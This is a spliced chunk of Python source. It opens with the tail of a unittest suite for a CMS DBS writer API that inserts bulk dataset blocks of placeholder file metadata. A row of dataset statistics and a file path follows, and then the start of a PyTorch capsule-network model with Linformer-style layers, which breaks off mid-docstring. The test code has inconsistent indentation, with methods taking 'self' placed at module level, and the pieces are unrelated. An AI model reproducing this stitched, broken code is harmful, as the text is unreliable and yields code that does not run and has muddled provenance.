"/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" % (uid, 2)]
api.update('files', logical_file_name=lfn, is_file_valid=0, lost=1)
def test11a(self):
"""test11a: web.DBSWriterModel.updateBlock: Basic test"""
api.update('blocks', block_name=block, open_for_writing=0)
@checkException("block_name")
def test11b(self):
"""test11b: web.DBSWriterModel.updateBlock: missing data should raise exception"""
api.update('blocks')
def test11c(self):
"""test11c: web.DBSWriterModel.updateBlock: origin_site_name test"""
api.update('blocks', block_name=block, origin_site_name=site)
def test11d(self):
"""test11d: web.DBSWriterModel.updateBlock: origin_site_name and open_for_writing test"""
api.update('blocks', block_name=block, origin_site_name=site, open_for_writing=1)
    @checkException("already exists")
    def test12a(self):
        """test12a: web.DBSWriterModel.insertBulkBlock: existing block will raise an exception"""
        # Rebuilds the full bulk-block payload around the block already
        # inserted by test06a; the server must refuse the duplicate block.
        dataset_dict = {'dataset': dataset,
                        'physics_group_name': 'Tracker', 'primary_ds_name': primary_ds_name,
                        'dataset_access_type': 'VALID', 'processed_ds_name': procdataset,
                        'xtcrosssection': 123, 'primary_ds_type': primary_ds_type, 'data_tier_name': tier,
                        'prep_id':prep_id}
        block_dict = {'block_name': block,
                      'origin_site_name': site}
        processing_dict = {'processing_version': processing_version,
                           'description':'this-is-a-test'}
        acquisition_dict = {'acquisition_era_name': acquisition_era_name}
        primary_dict = {'primary_ds_name':primary_ds_name,
                        'primary_ds_type':primary_ds_type}
        output_module_dict = {'release_version': release_version, 'pset_hash': pset_hash,
                              'app_name': app_name, 'output_module_label': output_module_label,
                              'global_tag':global_tag}
        file_output_dict = {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                            'output_module_label': output_module_label, 'global_tag': global_tag}
        fileList=[]
        for i in range(10):
            f={
                'adler32': '', 'file_type': 'EDM',
                'dataset': dataset,
                'file_size': u'2012211901', 'auto_cross_section': 0.0,
                'check_sum': u'1504266448',
                'file_lumi_list': [
                  {'lumi_section_num': u'27414', 'run_num': u'1'},
                  {'lumi_section_num': u'26422', 'run_num': u'1'},
                  {'lumi_section_num': u'29838', 'run_num': u'1'}
                  ],
                'file_parent_list': [ ],
                'event_count': u'1619',
                'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
               }
            fileList.append(f)
        # Assemble the composite bulkblocks document expected by the server.
        data = {'file_conf_list' : [file_output_dict],
                'dataset_conf_list' : [output_module_dict],
                'block_parent_list' : [],
                'processing_era' : processing_dict,
                'files' : fileList,
                'dataset' : dataset_dict,
                'primds' : primary_dict,
                'acquisition_era' : acquisition_dict,
                'ds_parent_list' : [],
                'block' : block_dict,
                'file_parent_list' : []}
        api.insert('bulkblocks', data)
    def test12b(self):
        """test12b: web.DBSWriterModel.insertBulkBlock: basic test"""
        # Build a brand-new primary dataset / processed dataset / block so the
        # bulk insert cannot collide with earlier tests.
        uniq_id = int(time.time())
        bulk_primary_ds_name = 'unittest_web_primary_ds_name_%s' % (uniq_id)
        bulk_procdataset = '%s-unittest_web_dataset-v%s' % (acquisition_era_name, processing_version)
        bulk_dataset = '/%s/%s/%s' % (bulk_primary_ds_name,
                                      bulk_procdataset,
                                      tier)
        # NOTE(review): the block name is derived from the pre-existing
        # `dataset`, not `bulk_dataset` (test12b2 uses bulk_dataset here) —
        # presumably intentional/tolerated by the server; confirm.
        bulk_block="%s#%s" % (dataset, uniq_id)
        dataset_dict = {u'dataset': bulk_dataset,
                        u'physics_group_name': 'Tracker',
                        u'dataset_access_type': 'VALID', u'processed_ds_name': bulk_procdataset,
                        u'xtcrosssection': 123, u'data_tier_name': tier,
                        u'prep_id':prep_id}
        # NOTE(review): the chained `= data` alias is dead — `data` is
        # reassigned below before use.
        block_dict = data = {u'block_name': bulk_block,
                             u'origin_site_name': site}
        processing_dict = {u'processing_version': processing_version,
                           u'description':'this-is-a-test'}
        acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
        primary_dict = {u'primary_ds_name':bulk_primary_ds_name,
                        u'primary_ds_type':primary_ds_type}
        output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
                              u'app_name': app_name, u'output_module_label': output_module_label,
                              u'global_tag':global_tag}
        fileList = []
        fileConfigList = []
        # Three groups of files exercise the three integrity-field variants:
        # md5+check_sum, adler32 only, adler32+check_sum.
        for i in range(10):
            uniq_id = int(time.time())*1000
            f={
                u'md5': 'abc', u'file_type': 'EDM',
                u'file_size': '2012211901', u'auto_cross_section': 0.0,
                u'check_sum': '1504266448',
                u'file_lumi_list': [
                  {u'lumi_section_num': '27414', u'run_num': '1'},
                  {u'lumi_section_num': '26422', u'run_num': '1'},
                  {u'lumi_section_num': '29838', u'run_num': '1'}
                  ],
                u'event_count': u'1619',
                u'logical_file_name': "/store/mc/Fall09/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
               }
            fileList.append(f)
        for i in range(2):
            uniq_id = int(time.time())*1000
            f={
                u'file_type': 'EDM',
                u'file_size': '2012211901', u'auto_cross_section': 0.0,
                u'adler32': 'abc123',
                u'file_lumi_list': [
                  {u'lumi_section_num': '27414', u'run_num': '1'},
                  {u'lumi_section_num': '26422', u'run_num': '1'},
                  {u'lumi_section_num': '29838', u'run_num': '1'}
                  ],
                u'event_count': u'1619',
                u'logical_file_name': "/store/mc/Fall/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
               }
            fileList.append(f)
        for i in range(2):
            uniq_id = int(time.time())*1000
            f={
                u'adler32': 'abc1234', u'file_type': 'EDM',
                u'file_size': '2012211901', u'auto_cross_section': 0.0,
                u'check_sum': '1504266448',
                u'file_lumi_list': [
                  {u'lumi_section_num': '27414', u'run_num': '1'},
                  {u'lumi_section_num': '26422', u'run_num': '1'},
                  {u'lumi_section_num': '29838', u'run_num': '1'}
                  ],
                u'event_count': u'1619',
                u'logical_file_name': "/store/mc/Fall15/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
               }
            fileList.append(f)
        # NOTE(review): only the last file (`f` after the loops) gets a
        # file_conf_list entry — presumably intentional; confirm.
        file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
                            u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
        fileConfigList.append(file_output_dict)
        data = {'file_conf_list': fileConfigList,
                'dataset_conf_list': [output_module_dict],
                'processing_era': processing_dict,
                'files': fileList,
                'dataset': dataset_dict,
                'primds': primary_dict,
                'acquisition_era': acquisition_dict,
                'block': block_dict,
               }
        api.insert('bulkblocks', data)
    def test12b2(self):
        """test12b2: web.DBSWriterModel.insertBulkBlock with events per lumi: basic test\n"""
        # Like test12b, but with per-lumi event_count fields and tier2;
        # the +1 keeps the primary dataset name distinct from test12b's.
        uniq_id = int(time.time()) + 1
        bulk_primary_ds_name = 'unittest_web_primary_ds_name_%s' % (uniq_id)
        bulk_procdataset = '%s-unittest_web_dataset-v%s' % (acquisition_era_name, processing_version)
        bulk_dataset = '/%s/%s/%s' % (bulk_primary_ds_name,
                                      bulk_procdataset,
                                      tier2)
        bulk_block="%s#%s" % (bulk_dataset, uniq_id)
        print('dataset = ' , bulk_dataset)
        print('block = ', bulk_block)
        dataset_dict = {u'dataset': bulk_dataset,
                        u'physics_group_name': 'Tracker',
                        u'dataset_access_type': 'VALID', u'processed_ds_name': bulk_procdataset,
                        u'xtcrosssection': 123, u'data_tier_name': tier2,
                        u'prep_id':prep_id}
        # NOTE(review): `= data` alias is dead — `data` is reassigned below.
        block_dict = data = {u'block_name': bulk_block,
                             u'origin_site_name': site}
        processing_dict = {u'processing_version': processing_version,
                           u'description':'this-is-a-test'}
        acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
        primary_dict = {u'primary_ds_name':bulk_primary_ds_name,
                        u'primary_ds_type':primary_ds_type}
        output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
                              u'app_name': app_name, u'output_module_label': output_module_label,
                              u'global_tag':global_tag}
        fileList = []
        fileConfigList = []
        # Three groups exercising distinct runs (11/12/13) and the three
        # integrity-field variants, each lumi carrying its own event_count.
        for i in range(20,30):
            uniq_id = int(time.time())*1000
            f={
                u'md5': 'abc', u'file_type': 'EDM',
                u'file_size': '2012211901', u'auto_cross_section': 0.0,
                u'check_sum': '1504266448',
                u'file_lumi_list': [
                  {u'lumi_section_num': '27', u'run_num': '11', u'event_count': '100' },
                  {u'lumi_section_num': '28', u'run_num': '11', u'event_count': '111'},
                  {u'lumi_section_num': '29', u'run_num': '11', u'event_count': '222'}
                  ],
                u'event_count': u'1619',
                u'logical_file_name': "/store/mc/Fall09/BBJets250to500-madgraph/RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
               }
            fileList.append(f)
        for i in range(40,42):
            uniq_id = int(time.time())*10000
            f={
                u'file_type': 'EDM',
                u'file_size': '2012211901', u'auto_cross_section': 0.0,
                u'adler32': 'abc123',
                u'file_lumi_list': [
                  {u'lumi_section_num': '270', u'run_num': '12', u'event_count': '300'},
                  {u'lumi_section_num': '280', u'run_num': '12', u'event_count': '301'},
                  {u'lumi_section_num': '290', u'run_num': '12', u'event_count': '302'}
                  ],
                u'event_count': u'1619',
                u'logical_file_name': "/store/mc/Fall/BBJets250to500-madgraph/RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
               }
            fileList.append(f)
        for i in range(50,52):
            uniq_id = int(time.time())*1000
            f={
                u'adler32': 'abc1234', u'file_type': 'EDM',
                u'file_size': '2012211901', u'auto_cross_section': 0.0,
                u'check_sum': '1504266448',
                u'file_lumi_list': [
                  {u'lumi_section_num': '27414', u'run_num': '13', u'event_count': '400'},
                  {u'lumi_section_num': '26422', u'run_num': '13', u'event_count': '401'},
                  {u'lumi_section_num': '29838', u'run_num': '13', u'event_count': '402'}
                  ],
                u'event_count': u'1619',
                u'logical_file_name': "/store/mc/Fall15/BBJets250to500-madgraph/RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
               }
            fileList.append(f)
        # NOTE(review): only the last file gets a file_conf_list entry —
        # presumably intentional; confirm.
        file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
                            u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
        fileConfigList.append(file_output_dict)
        data = {'file_conf_list': fileConfigList,
                'dataset_conf_list': [output_module_dict],
                'processing_era': processing_dict,
                'files': fileList,
                'dataset': dataset_dict,
                'primds': primary_dict,
                'acquisition_era': acquisition_dict,
                'block': block_dict,
               }
        api.insert('bulkblocks', data)
    @checkException("check_sum")
    def test12c(self):
        """test12c: web.DBSWriterModel.insertBulkBlock: negtive test with missing check_sum, adler32 or md5"""
        # Files carry none of check_sum/adler32/md5; the decorator asserts
        # the server rejects the bulk insert on that ground.
        uniq_id = int(time.time())*1000
        bulk_primary_ds_name = 'unittest_web_primary_ds_name_%s' % (uniq_id)
        bulk_procdataset = '%s-unittest_web_dataset-v%s' % (acquisition_era_name, processing_version)
        bulk_dataset = '/%s/%s/%s' % (bulk_primary_ds_name,
                                      bulk_procdataset,
                                      tier)
        bulk_block="%s#%s" % (dataset, uniq_id)
        dataset_dict = {u'dataset': bulk_dataset,
                        u'physics_group_name': 'Tracker',
                        u'dataset_access_type': 'VALID', u'processed_ds_name': bulk_procdataset,
                        u'xtcrosssection': 123, u'data_tier_name': tier,
                        u'prep_id':prep_id}
        # NOTE(review): `= data` alias is dead — `data` is reassigned below.
        block_dict = data = {u'block_name': bulk_block,
                             u'origin_site_name': site}
        processing_dict = {u'processing_version': processing_version,
                           u'description':'this-is-a-test'}
        acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
        primary_dict = {u'primary_ds_name':bulk_primary_ds_name,
                        u'primary_ds_type':primary_ds_type}
        output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
                              u'app_name': app_name, u'output_module_label': output_module_label,
                              u'global_tag':global_tag}
        fileList = []
        fileConfigList = []
        for i in range(2):
            f={
                u'file_type': 'EDM',
                u'file_size': '2012211901', u'auto_cross_section': 0.0,
                u'file_lumi_list': [
                  {u'lumi_section_num': '27414', u'run_num': '1'},
                  {u'lumi_section_num': '26422', u'run_num': '1'},
                  {u'lumi_section_num': '29838', u'run_num': '1'}
                  ],
                u'event_count': u'1619',
                u'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
               }
            fileList.append(f)
        file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
                            u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
        fileConfigList.append(file_output_dict)
        data = {'file_conf_list': fileConfigList,
                'dataset_conf_list': [output_module_dict],
                'processing_era': processing_dict,
                'files': fileList,
                'dataset': dataset_dict,
                'primds': primary_dict,
                'acquisition_era': acquisition_dict,
                'block': block_dict,
               }
        api.insert('bulkblocks', data)
    def test12d(self):
        """test12d: web.DBSWriterModel.insertBulkBlock: basic test for inserting child dataset with files"""
        # Creates the step-chain parent dataset/block whose files the
        # follow-up test (test12e) references as parents.
        dataset_dict = {u'dataset': parent_stepchain_dataset,
                        u'physics_group_name': 'Tracker',
                        u'dataset_access_type': 'VALID', u'processed_ds_name': parent_procdataset,
                        u'xtcrosssection': 123, u'data_tier_name': tier,
                        u'prep_id':prep_id}
        # NOTE(review): `= data` alias is dead — `data` is reassigned below.
        block_dict = data = {u'block_name': parent_stepchain_block,
                             u'origin_site_name': site}
        processing_dict = {u'processing_version': processing_version,
                           u'description':'this-is-a-test'}
        acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
        primary_dict = {u'primary_ds_name':primary_ds_name + "_stepchain",
                        u'primary_ds_type':primary_ds_type}
        output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
                              u'app_name': app_name, u'output_module_label': output_module_label,
                              u'global_tag':global_tag}
        fileList = []
        fileConfigList = []
        for i in range(2):
            f={
                u'file_type': 'EDM',
                u'file_size': '2012211901', u'auto_cross_section': 0.0,
                u'check_sum': u'1504266448',
                u'file_lumi_list': [
                  {u'lumi_section_num': '27414', u'run_num': '1'},
                  {u'lumi_section_num': '26422', u'run_num': '1'},
                  {u'lumi_section_num': '29838', u'run_num': '1'}
                  ],
                u'event_count': u'1619',
                u'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/parent_%s/%i.root" %(uid, i),
               }
            fileList.append(f)
        file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
                            u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
        fileConfigList.append(file_output_dict)
        data = {'file_conf_list': fileConfigList,
                'dataset_conf_list': [output_module_dict],
                'processing_era': processing_dict,
                'files': fileList,
                'dataset': dataset_dict,
                'primds': primary_dict,
                'acquisition_era': acquisition_dict,
                'block': block_dict,
                'dataset_parent_list': []
               }
        api.insert('bulkblocks', data)
def test12e(self):
    """test12e: web.DBSWriterModel.insertBulkBlock: insert bulk block with parent dataset negative test"""
    dataset_dict = {u'dataset': stepchain_dataset,
                    u'physics_group_name': 'Tracker',
                    u'dataset_access_type': 'VALID', u'processed_ds_name': procdataset,
                    u'xtcrosssection': 123, u'data_tier_name': tier,
                    u'prep_id': prep_id}
    # Fixed: dropped the dead chained assignment "block_dict = data = {...}";
    # `data` is rebuilt from scratch below, so the extra binding only confused.
    block_dict = {u'block_name': stepchain_block,
                  u'origin_site_name': site}
    processing_dict = {u'processing_version': processing_version,
                       u'description': 'this-is-a-test'}
    acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date': 1234567890}
    primary_dict = {u'primary_ds_name': primary_ds_name,
                    u'primary_ds_type': primary_ds_type}
    output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
                          u'app_name': app_name, u'output_module_label': output_module_label,
                          u'global_tag': global_tag}
    fileList = []
    fileConfigList = []
    for i in range(2):
        f = {
            u'file_type': 'EDM',
            u'file_size': '2012211901', u'auto_cross_section': 0.0,
            u'check_sum': u'1504266448',
            u'file_lumi_list': [
                {u'lumi_section_num': '27414', u'run_num': '1'},
                {u'lumi_section_num': '26422', u'run_num': '1'},
                {u'lumi_section_num': '29838', u'run_num': '1'}
            ],
            u'event_count': u'1619',
            u'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/child_%s/%i.root" % (uid, i),
        }
        fileList.append(f)
        file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
                            u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn': f["logical_file_name"]}
        fileConfigList.append(file_output_dict)
    # NOTE(review): `i` below is the leftover loop index (1), so only the
    # last parent LFN is listed. Preserved as-is: this payload is deliberately
    # malformed and the insert is expected to be rejected — confirm intent.
    data = {'file_conf_list': fileConfigList,
            'dataset_conf_list': [output_module_dict],
            'processing_era': processing_dict,
            'files': fileList,
            'dataset': dataset_dict,
            'primds': primary_dict,
            'acquisition_era': acquisition_dict,
            'block': block_dict,
            'dataset_parent_list': [parent_stepchain_dataset],
            'file_parent_list': [{"file_parent_lfn": "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/parent_%s/%i.root" % (
                uid, i)}]
            }
    with self.assertRaises(Exception):
        api.insert('bulkblocks', data)
def test12f(self):
    """test12f: web.DBSWriterModel.insertBulkBlock: insert bulk block with parent dataset"""
    dataset_dict = {u'dataset': stepchain_dataset,
                    u'physics_group_name': 'Tracker',
                    u'dataset_access_type': 'VALID', u'processed_ds_name': procdataset,
                    u'xtcrosssection': 123, u'data_tier_name': tier,
                    u'prep_id': prep_id}
    # Fixed: dropped the dead chained assignment "block_dict = data = {...}";
    # `data` is rebuilt from scratch below, so the extra binding only confused.
    block_dict = {u'block_name': stepchain_block,
                  u'origin_site_name': site}
    processing_dict = {u'processing_version': processing_version,
                       u'description': 'this-is-a-test'}
    acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date': 1234567890}
    primary_dict = {u'primary_ds_name': primary_ds_name + "_stepchain",
                    u'primary_ds_type': primary_ds_type}
    output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
                          u'app_name': app_name, u'output_module_label': output_module_label,
                          u'global_tag': global_tag}
    fileList = []
    fileConfigList = []
    for i in range(2):
        f = {
            u'file_type': 'EDM',
            u'file_size': '2012211901', u'auto_cross_section': 0.0,
            u'check_sum': u'1504266448',
            u'file_lumi_list': [
                {u'lumi_section_num': '27414', u'run_num': '1'},
                {u'lumi_section_num': '26422', u'run_num': '1'},
                {u'lumi_section_num': '29838', u'run_num': '1'}
            ],
            u'event_count': u'1619',
            u'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/child_%s/%i.root" % (uid, i),
        }
        fileList.append(f)
        file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
                            u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn': f["logical_file_name"]}
        fileConfigList.append(file_output_dict)
    # Valid payload: child block declares its parent dataset and should insert.
    data = {'file_conf_list': fileConfigList,
            'dataset_conf_list': [output_module_dict],
            'processing_era': processing_dict,
            'files': fileList,
            'dataset': dataset_dict,
            'primds': primary_dict,
            'acquisition_era': acquisition_dict,
            'block': block_dict,
            'dataset_parent_list': [parent_stepchain_dataset]
            }
    api.insert('bulkblocks', data)
def test999(self):
    """setup all necessary parameters"""
    # Persist the collected parameters next to this test module so
    # follow-up test suites can read them back as `info`.
    filename = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'info.dict')
    # Fixed: use a context manager so the handle is closed even if the
    # write raises (the original open/write/close leaked on error).
    with open(filename, "w") as infoout:
        infoout.write("info=" + str(outDict))
if __name__ == "__main__":
    # Collect every test method of DBSWriterModel_t and run the suite
    # with verbose per-test output.
    loader = unittest.TestLoader()
    SUITE = loader.loadTestsFromTestCase(DBSWriterModel_t)
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(SUITE)
| 43.640277
| 142
| 0.569906
| 6,268
| 56,776
| 4.854499
| 0.062221
| 0.027803
| 0.041344
| 0.016564
| 0.825424
| 0.798574
| 0.775306
| 0.758118
| 0.736756
| 0.706422
| 0
| 0.041066
| 0.299176
| 56,776
| 1,300
| 143
| 43.673846
| 0.723649
| 0.004333
| 0
| 0.678917
| 0
| 0.026112
| 0.307107
| 0.053075
| 0
| 0
| 0
| 0
| 0.000967
| 0
| null | null | 0
| 0.010638
| null | null | 0.008704
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
735045cacbb6566a68320f9609cf0a374c75add9
| 53,910
|
py
|
Python
|
src/capsule_model.py
|
Sharut/Bilinear-Linformer
|
025e2ffefe8bb57092cd4a912ea66ec3d65997e0
|
[
"MIT"
] | null | null | null |
src/capsule_model.py
|
Sharut/Bilinear-Linformer
|
025e2ffefe8bb57092cd4a912ea66ec3d65997e0
|
[
"MIT"
] | null | null | null |
src/capsule_model.py
|
Sharut/Bilinear-Linformer
|
025e2ffefe8bb57092cd4a912ea66ec3d65997e0
|
[
"MIT"
] | null | null | null |
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2019 Apple Inc. All Rights Reserved.
#
from src import layers
import torch.nn as nn
import torch.nn.functional as F
import torch
'''
{'backbone': {'kernel_size': 3, 'output_dim': 128, 'input_dim': 3, 'stride': 2, 'padding': 1, 'out_img_size': 16}, 'primary_capsules': {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'nu
m_caps': 32, 'padding': 0, 'out_img_size': 16}, 'capsules': [{'type': 'CONV', 'num_caps': 32, 'caps_dim': 16, 'kernel_size': 3, 'stride': 2, 'matrix_pose': True, 'out_img_size': 7}, {'type': 'CONV', 'num_
caps': 32, 'caps_dim': 16, 'kernel_size': 3, 'stride': 1, 'matrix_pose': True, 'out_img_size': 5}], 'class_capsules': {'num_caps': 10, 'caps_dim': 16, 'matrix_pose': True}}
{'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'num_caps': 32, 'padding': 0, 'out_img_size': 16}
'''
# Capsule model with bilinear routing and random projections
class CapsBilinearLinformerUnfoldModel(nn.Module):
    """Capsule network using Linformer-style (LA*) capsule layers.

    Pipeline: backbone -> primary-capsule CNN -> LayerNorm -> a stack of
    LACapsuleCONV / LACapsuleFC layers with iterative routing -> class
    capsules -> a shared 1-unit linear classifier per class capsule.
    """

    def __init__(self,
                 image_dim_size,
                 params,
                 dataset,
                 backbone,
                 dp,
                 num_routing,
                 sequential_routing=True):
        """Build all sub-modules from the `params` configuration dict.

        Args:
            image_dim_size: unused in this constructor (kept for API parity
                with sibling models — TODO confirm callers).
            params: config with 'backbone', 'primary_capsules', 'capsules'
                and 'class_capsules' sections (see module-level example).
            dataset: dataset name; selects the ResNet backbone variant.
            backbone: 'simple' or 'resnet'.
            dp: dropout rate forwarded to every capsule layer.
            num_routing: routing iterations per layer (>3 may converge slowly).
            sequential_routing: route layer-by-layer if True, else concurrently.
        """
        super(CapsBilinearLinformerUnfoldModel, self).__init__()
        #### Parameters
        self.sequential_routing = sequential_routing

        ## Primary Capsule Layer
        self.pc_num_caps = params['primary_capsules']['num_caps']
        self.pc_caps_dim = params['primary_capsules']['caps_dim']
        self.pc_output_dim = params['primary_capsules']['out_img_size']
        ## General
        self.num_routing = num_routing  # >3 may cause slow converging

        #### Building Networks
        ## Backbone (before capsule)
        if backbone == 'simple':
            self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
                                                   params['backbone']['output_dim'],
                                                   params['backbone']['kernel_size'],
                                                   params['backbone']['stride'],
                                                   params['backbone']['padding'])
        elif backbone == 'resnet':
            # Outputs 16 x 16 x 128 feature map.
            if dataset == 'CIFAR10' or dataset == 'CIFAR100':
                print("Using CIFAR backbone")
                self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
                                                             params['backbone']['output_dim'],
                                                             params['backbone']['stride'])
            else:
                print("Using New ResNet Backbone")
                self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
                                                                params['backbone']['output_dim'],
                                                                params['backbone']['stride'])

        ## Primary Capsule Layer (a single CNN)
        # Emits num_caps * caps_dim channels which are reshaped into
        # capsules in forward().
        self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
                                  out_channels=params['primary_capsules']['num_caps'] *
                                  params['primary_capsules']['caps_dim'],
                                  kernel_size=params['primary_capsules']['kernel_size'],
                                  stride=params['primary_capsules']['stride'],
                                  padding=params['primary_capsules']['padding'],
                                  bias=False)
        # self.pc_layer = nn.Sequential()
        self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])

        ## Main Capsule Layers
        self.capsule_layers = nn.ModuleList([])
        for i in range(len(params['capsules'])):
            if params['capsules'][i]['type'] == 'CONV':
                # Input capsule count/dim come from the previous layer,
                # or from the primary capsules for the first layer.
                in_n_caps = params['primary_capsules']['num_caps'] if i == 0 else \
                    params['capsules'][i - 1]['num_caps']
                in_d_caps = params['primary_capsules']['caps_dim'] if i == 0 else \
                    params['capsules'][i - 1]['caps_dim']
                output_img_size = params['capsules'][i]['out_img_size']
                input_img_size = params['primary_capsules']['out_img_size'] if i == 0 else \
                    params['capsules'][i - 1]['out_img_size']
                self.capsule_layers.append(
                    layers.LACapsuleCONV(in_n_capsules=in_n_caps,
                                         in_d_capsules=in_d_caps,
                                         out_n_capsules=params['capsules'][i]['num_caps'],
                                         out_d_capsules=params['capsules'][i]['caps_dim'],
                                         kernel_size=params['capsules'][i]['kernel_size'],
                                         stride=params['capsules'][i]['stride'],
                                         input_img_size=input_img_size,
                                         output_img_size=output_img_size,
                                         hidden_dim=params['capsules'][i]['hidden_dim'],
                                         matrix_pose=params['capsules'][i]['matrix_pose'],
                                         dp=dp,
                                         coordinate_add=False,
                                         padding=params['capsules'][i].get('padding', None)
                                         )
                )
            elif params['capsules'][i]['type'] == 'FC':
                output_img_size = 1
                if i == 0:
                    # FC directly after primary capsules: flatten the whole
                    # spatial grid into one capsule list.
                    in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] * \
                        params['primary_capsules']['out_img_size']
                    in_d_caps = params['primary_capsules']['caps_dim']
                    input_img_size = params['primary_capsules']['out_img_size']
                elif params['capsules'][i - 1]['type'] == 'FC':
                    in_n_caps = params['capsules'][i - 1]['num_caps']
                    in_d_caps = params['capsules'][i - 1]['caps_dim']
                    input_img_size = 1
                elif params['capsules'][i - 1]['type'] == 'CONV':
                    in_n_caps = params['capsules'][i - 1]['num_caps'] * params['capsules'][i - 1]['out_img_size'] * \
                        params['capsules'][i - 1]['out_img_size']
                    in_d_caps = params['capsules'][i - 1]['caps_dim']
                    input_img_size = params['capsules'][i - 1]['out_img_size']
                self.capsule_layers.append(
                    layers.LACapsuleFC(in_n_capsules=in_n_caps,
                                       in_d_capsules=in_d_caps,
                                       out_n_capsules=params['capsules'][i]['num_caps'],
                                       out_d_capsules=params['capsules'][i]['caps_dim'],
                                       input_img_size=input_img_size,
                                       output_img_size=output_img_size,
                                       hidden_dim=params['capsules'][i]['hidden_dim'],
                                       matrix_pose=params['capsules'][i]['matrix_pose'],
                                       dp=dp
                                       )
                )

        ## Class Capsule Layer
        if not len(params['capsules']) == 0:
            output_img_size = 1
            if params['capsules'][-1]['type'] == 'FC':
                in_n_caps = params['capsules'][-1]['num_caps']
                in_d_caps = params['capsules'][-1]['caps_dim']
                input_img_size = 1
            elif params['capsules'][-1]['type'] == 'CONV':
                in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] * \
                    params['capsules'][-1]['out_img_size']
                in_d_caps = params['capsules'][-1]['caps_dim']
                input_img_size = params['capsules'][-1]['out_img_size']
        else:
            in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] * \
                params['primary_capsules']['out_img_size']
            in_d_caps = params['primary_capsules']['caps_dim']
            input_img_size = params['primary_capsules']['out_img_size']
        # NOTE(review): `hidden_dim` below reuses loop index `i` (the last
        # intermediate layer); with an empty 'capsules' list this — and the
        # unset output_img_size — would fail, so a non-empty 'capsules'
        # config appears to be assumed. Confirm against the configs used.
        self.capsule_layers.append(
            layers.LACapsuleFC(in_n_capsules=in_n_caps,
                               in_d_capsules=in_d_caps,
                               out_n_capsules=params['class_capsules']['num_caps'],
                               out_d_capsules=params['class_capsules']['caps_dim'],
                               input_img_size=input_img_size,
                               output_img_size=output_img_size,
                               hidden_dim=params['capsules'][i]['hidden_dim'],
                               matrix_pose=params['class_capsules']['matrix_pose'],
                               dp=dp
                               )
        )

        ## After Capsule
        # fixed classifier for all class capsules
        self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
        # different classifier for different capsules
        # self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))

    def forward(self, x, lbl_1=None, lbl_2=None):
        """Run backbone, primary capsules and routed capsule layers.

        Args:
            x: input image batch.
            lbl_1, lbl_2: unused here; presumably kept for trainer API
                compatibility — confirm against callers.

